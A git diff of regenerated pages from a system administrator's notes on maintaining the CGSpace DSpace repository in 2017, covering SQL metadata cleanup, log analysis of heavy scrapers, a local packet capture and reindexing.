      dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
      +
      dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
       UPDATE 4899
       
      • Wow, I just wrote this baller regex facet to find duplicate authors:
      • @@ -370,7 +370,7 @@ java.io.StreamCorruptedException: invalid stream header: 00000000
      • Weird that these errors seem to have started on August 11th, the same day we had capacity issues with PostgreSQL:
      -
      # grep -c "ERROR net.sf.ehcache.store.DiskStore" dspace.log.2017-08-*
      +
      # grep -c "ERROR net.sf.ehcache.store.DiskStore" dspace.log.2017-08-*
       dspace.log.2017-08-01:0
       dspace.log.2017-08-02:0
       dspace.log.2017-08-03:0
      @@ -418,7 +418,7 @@ SELECT
           ?label 
       WHERE {  
          {  ?concept  skos:altLabel ?label . } UNION {  ?concept  skos:prefLabel ?label . }
      -   FILTER regex(str(?label), "^fish", "i") .
      +   FILTER regex(str(?label), "^fish", "i") .
       } LIMIT 10;
       
       ┌───────────────────────┐                                                      
      @@ -452,7 +452,7 @@ WHERE {
       
    • Since I cleared the XMLUI cache on 2017-08-17 there haven’t been any more ERROR net.sf.ehcache.store.DiskStore errors
    • Look at the CGIAR Library to see if I can find the items that have been submitted since May:
    -
    dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z';
    +
    dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z';
      metadata_value_id | item_id | metadata_field_id |      text_value      | text_lang | place | authority | confidence 
     -------------------+---------+-------------------+----------------------+-----------+-------+-----------+------------
                 123117 |    5872 |                11 | 2017-06-28T13:05:18Z |           |     1 |           |         -1
    @@ -465,7 +465,7 @@ WHERE {
     
  • According to dc.date.accessioned (metadata field id 11) there have only been five items submitted since May
  • These are their handles:
  • -
    dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
    +
    dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
        handle   
     ------------
      10947/4658
    diff --git a/docs/2017-09/index.html b/docs/2017-09/index.html
    index dc65e3a42..23fa52961 100644
    --- a/docs/2017-09/index.html
    +++ b/docs/2017-09/index.html
    @@ -32,7 +32,7 @@ Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two
     
     Ask Sisay to clean up the WLE approvers a bit, as Marianne’s user account is both in the approvers step as well as the group
     "/>
    -
    +
     
     
         
    @@ -130,7 +130,7 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne’s user account
     
    • Delete 58 blank metadata values from the CGSpace database:
    -
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
     DELETE 58
     
    • I also ran it on DSpace Test because we’ll be migrating the CGIAR Library soon and it would be good to catch these before we migrate
    • @@ -145,7 +145,7 @@ DELETE 58
    • There will need to be some metadata updates — though if I recall correctly it is only about seven records — for that as well, I had made some notes about it in 2017-07, but I’ve asked for more clarification from Lili just in case
    • Looking at the DSpace logs to see if we’ve had a change in the “Cannot get a connection” errors since last month when we adjusted the db.maxconnections parameter on CGSpace:
    -
    # grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-09-*
    +
    # grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-09-*
     dspace.log.2017-09-01:0
     dspace.log.2017-09-02:0
     dspace.log.2017-09-03:9
    @@ -174,7 +174,7 @@ dspace.log.2017-09-10:0
     
  • The import process takes the same amount of time with and without the caching
  • Also, I captured TCP packets destined for port 80 and both imports only captured ONE packet (an update check from some component in Java):
  • -
    $ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
    +
    $ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
     
    • Great TCP dump guide here: https://danielmiessler.com/study/tcpdump
    • The last part of that command filters for HTTP GET requests, of which there should have been many to fetch all the XSD files for validation
    • @@ -204,7 +204,7 @@ dspace.log.2017-09-10:0
    • I wonder what was going on, and looking into the nginx logs I think maybe it’s OAI…
    • Here is yesterday’s top ten IP addresses making requests to /oai:
    -
    # awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
    +
    # awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
           1 213.136.89.78
           1 66.249.66.90
           1 66.249.66.92
    @@ -217,7 +217,7 @@ dspace.log.2017-09-10:0
     
    • Compared to the previous day’s logs it looks VERY high:
    -
    # awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
    +
    # awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
           1 207.46.13.39
           1 66.249.66.93
           2 66.249.66.91
    @@ -234,9 +234,9 @@ dspace.log.2017-09-10:0
     
     
  • And this user agent has never been seen before today (or at least recently!):
  • -
    # grep -c "API scraper" /var/log/nginx/oai.log
    +
    # grep -c "API scraper" /var/log/nginx/oai.log
     62088
    -# zgrep -c "API scraper" /var/log/nginx/oai.log.*.gz
    +# zgrep -c "API scraper" /var/log/nginx/oai.log.*.gz
     /var/log/nginx/oai.log.10.gz:0
     /var/log/nginx/oai.log.11.gz:0
     /var/log/nginx/oai.log.12.gz:0
    @@ -270,7 +270,7 @@ dspace.log.2017-09-10:0
     
  • Some of these heavy users are also using XMLUI, and their user agent isn’t matched by the Tomcat Session Crawler valve, so each request uses a different session
  • Yesterday alone the IP addresses using the API scraper user agent were responsible for 16,000 sessions in XMLUI:
  • -
    # grep -a -E "(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)" /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    # grep -a -E "(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)" /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     15924
     
    • If this continues I will definitely need to figure out who is responsible for this scraper and add their user agent to the session crawler valve regex
    • @@ -282,7 +282,7 @@ dspace.log.2017-09-10:0
    • Looking at the spreadsheet with deletions and corrections that CCAFS sent last week
    • It appears they want to delete a lot of metadata, which I’m not sure they realize the implications of:
    -
    dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;                                                                                                                                                                                                                  
    +
    dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;                                                                                                                                                                                                                  
             text_value        | count                              
     --------------------------+-------                             
      FP4_ClimateModels        |     6                              
    @@ -309,18 +309,18 @@ dspace.log.2017-09-10:0
     
  • I sent CCAFS people an email to ask if they really want to remove these 200+ tags
  • She responded yes, so I’ll at least need to do these deletes in PostgreSQL:
  • -
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
     DELETE 207
     
    • When we discussed this in late July there were some other renames they had requested, but I don’t see them in the current spreadsheet so I will have to follow that up
    • I talked to Macaroni Bros and they said to just go ahead with the other corrections as well as their spreadsheet was evolved organically rather than systematically!
    • The final list of corrections and deletes should therefore be:
    -
    delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
    -update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
    -update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
    +
    delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
    +update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
    +update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
     
    • Create and merge pull request to shut up the Ehcache update check (#337)
    • Although it looks like there was a previous attempt to disable these update checks that was merged in DSpace 4.0 (although it only affects XMLUI): https://jira.duraspace.org/browse/DS-1492
    • @@ -332,7 +332,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
    • Testing to see how we end up with all these new authorities after we keep cleaning and merging them in the database
    • Here are all my distinct authority combinations in the database before:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence 
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -347,7 +347,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
     
    • And then after adding a new item and selecting an existing “Orth, Alan” with an ORCID in the author lookup:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence 
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -363,7 +363,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
     
    • It created a new authority… let’s try to add another item and select the same existing author and see what happens in the database:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence 
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -379,7 +379,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
     
    • No new one… so now let me try to add another item and select the italicized result from the ORCID lookup and see what happens in the database:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence 
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -396,7 +396,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
     
    • Shit, it created another authority! Let’s try it again!
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';                                                                                             
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';                                                                                             
      text_value |              authority               | confidence
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -439,19 +439,19 @@ DELETE 207
     
  • We still need to do the changes to config.dct and regenerate the sitebndl.zip to send to the Handle.net admins
  • According to this dspace-tech mailing list entry from 2011, we need to add the extra handle prefixes to config.dct like this:
  • -
    "server_admins" = (
    -"300:0.NA/10568"
    -"300:0.NA/10947"
    +
    "server_admins" = (
    +"300:0.NA/10568"
    +"300:0.NA/10947"
     )
     
    -"replication_admins" = (
    -"300:0.NA/10568"
    -"300:0.NA/10947"
    +"replication_admins" = (
    +"300:0.NA/10568"
    +"300:0.NA/10947"
     )
     
    -"backup_admins" = (
    -"300:0.NA/10568"
    -"300:0.NA/10947"
    +"backup_admins" = (
    +"300:0.NA/10568"
    +"300:0.NA/10947"
     )
     
    • More work on the CGIAR Library migration test run locally, as I was having problem with importing the last fourteen items from the CGIAR System Management Office community
    • @@ -494,7 +494,7 @@ DELETE 207
    • Abenet and I noticed that hdl.handle.net is blocked by ETC at ILRI Addis so I asked Biruk Debebe to route it over the satellite
    • Force thumbnail regeneration for the CGIAR System Organization’s Historic Archive community (2000 items):
    -
    $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p "ImageMagick PDF Thumbnail"
    +
    $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p "ImageMagick PDF Thumbnail"
     
    • I’m still waiting (over 1 day later) to hear back from the CGIAR System Organization about updating the DNS for library.cgiar.org
    @@ -552,7 +552,7 @@ DELETE 207
  • Communicate (finally) with Tania and Tunji from the CGIAR System Organization office to tell them to request CGNET make the DNS updates for library.cgiar.org
  • Peter wants me to clean up the text values for Delia Grace’s metadata, as the authorities are all messed up again since we cleaned them up in 2016-12:
  • -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';                                  
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';                                  
       text_value  |              authority               | confidence              
     --------------+--------------------------------------+------------             
      Grace, Delia |                                      |        600              
    @@ -563,12 +563,12 @@ DELETE 207
     
  • Strangely, none of her authority entries have ORCIDs anymore…
  • I’ll just fix the text values and forget about it for now:
  • -
    dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
    +
    dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
     UPDATE 610
     
    • After this we have to reindex the Discovery and Authority cores (as tomcat7 user):
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
     
     real    83m56.895s
    diff --git a/docs/2017-10/index.html b/docs/2017-10/index.html
    index 8e843e148..549987651 100644
    --- a/docs/2017-10/index.html
    +++ b/docs/2017-10/index.html
    @@ -34,7 +34,7 @@ http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
     There appears to be a pattern but I’ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
     Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
     "/>
    -
    +
     
     
         
    @@ -140,7 +140,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
     
  • I thought maybe his account had expired (seeing as it’s was the first of the month) but he says he was finally able to log in today
  • The logs for yesterday show fourteen errors related to LDAP auth failures:
  • -
    $ grep -c "ldap_authentication:type=failed_auth" dspace.log.2017-10-01
    +
    $ grep -c "ldap_authentication:type=failed_auth" dspace.log.2017-10-01
     14
     
    • For what it’s worth, there are no errors on any other recent days, so it must have been some network issue on Linode or CGNET’s LDAP server
    • @@ -165,7 +165,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
    • Twice in the past twenty-four hours Linode has warned that CGSpace’s outbound traffic rate was exceeding the notification threshold
    • I had a look at yesterday’s OAI and REST logs in /var/log/nginx but didn’t see anything unusual:
    -
    # awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
    +
    # awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
         141 157.55.39.240
         145 40.77.167.85
         162 66.249.66.92
    @@ -176,7 +176,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
        1495 50.116.102.77
        3904 70.32.83.92
        9904 45.5.184.196
    -# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
    +# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
           5 66.249.66.71
           6 66.249.66.67
           6 68.180.229.31
    @@ -270,14 +270,14 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
     
  • Annnd I reloaded the Atmire Usage Stats module and the connections shot back up and CGSpace went down again
  • Still not sure where the load is coming from right now, but it’s clear why there were so many alerts yesterday on the 25th!
  • -
    # grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
    +
    # grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
     18022
     
    • Compared to other days there were two or three times the number of requests yesterday!
    -
    # grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
    +
    # grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
     3141
    -# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
    +# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
     7851
     
    • I still have no idea what was causing the load to go up today
    • @@ -302,7 +302,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
    • I’m still not sure why this started causing alerts so repeatadely the past week
    • I don’t see any tell tale signs in the REST or OAI logs, so trying to do rudimentary analysis in DSpace logs:
    -
    # grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    # grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     2049
     
    • So there were 2049 unique sessions during the hour of 2AM
    • @@ -310,7 +310,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
    • I think I’ll need to enable access logging in nginx to figure out what’s going on
    • After enabling logging on requests to XMLUI on / I see some new bot I’ve never seen before:
    -
    137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] "GET /discover?filtertype_0=type&filter_relational_operator_0=equals&filter_0=Internal+Document&filtertype=author&filter_relational_operator=equals&filter=CGIAR+Secretariat HTTP/1.1" 200 7776 "-" "Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)"
    +
    137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] "GET /discover?filtertype_0=type&filter_relational_operator_0=equals&filter_0=Internal+Document&filtertype=author&filter_relational_operator=equals&filter=CGIAR+Secretariat HTTP/1.1" 200 7776 "-" "Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)"
     
    • CORE seems to be some bot that is “Aggregating the world’s open access research papers”
    • The contact address listed in their bot’s user agent is incorrect, correct page is simply: https://core.ac.uk/contact
    • @@ -329,20 +329,20 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
    • Surprise surprise, the CORE bot is likely responsible for the recent load issues, making hundreds of thousands of requests yesterday and today:
    -
    # grep -c "CORE/0.6" /var/log/nginx/access.log 
    +
    # grep -c "CORE/0.6" /var/log/nginx/access.log 
     26475
    -# grep -c "CORE/0.6" /var/log/nginx/access.log.1
    +# grep -c "CORE/0.6" /var/log/nginx/access.log.1
     135083
     
    • IP addresses for this bot currently seem to be:
    -
    # grep "CORE/0.6" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
    +
    # grep "CORE/0.6" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
     137.108.70.6
     137.108.70.7
     
    • I will add their user agent to the Tomcat Session Crawler Valve but it won’t help much because they are only using two sessions:
    -
    # grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
    +
    # grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
     session_id=5771742CABA3D0780860B8DA81E0551B
     session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
     
      @@ -350,12 +350,12 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
    # grep -c 137.108.70 /var/log/nginx/access.log
     26622
    -# grep 137.108.70 /var/log/nginx/access.log | grep -c "GET /discover"
    +# grep 137.108.70 /var/log/nginx/access.log | grep -c "GET /discover"
     24055
     
    • Just because I’m curious who the top IPs are:
    -
    # awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
    +
    # awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
         496 62.210.247.93
         571 46.4.94.226
         651 40.77.167.39
    @@ -371,9 +371,9 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
     
  • 190.19.92.5 is apparently in Argentina, and 104.196.152.243 is from Google Cloud Engine
  • Actually, these two scrapers might be more responsible for the heavy load than the CORE bot, because they don’t reuse their session variable, creating thousands of new sessions!
  • -
    # grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    # grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     1419
    -# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     2811
     
    • From looking at the requests, it appears these are from CIAT and CCAFS
    • @@ -382,11 +382,11 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
    • Ah, wait, it looks like crawlerIps only came in 2017-06, so probably isn’t in Ubuntu 16.04’s 7.0.68 build!
    • That would explain the errors I was getting when trying to set it:
    -
    WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
    +
    WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
     
    • As for now, it actually seems the CORE bot coming from 137.108.70.6 and 137.108.70.7 is only using a few sessions per day, which is good:
    -
    # grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
    +
    # grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
         410 session_id=74F0C3A133DBF1132E7EC30A7E7E0D60:ip_addr=137.108.70.7
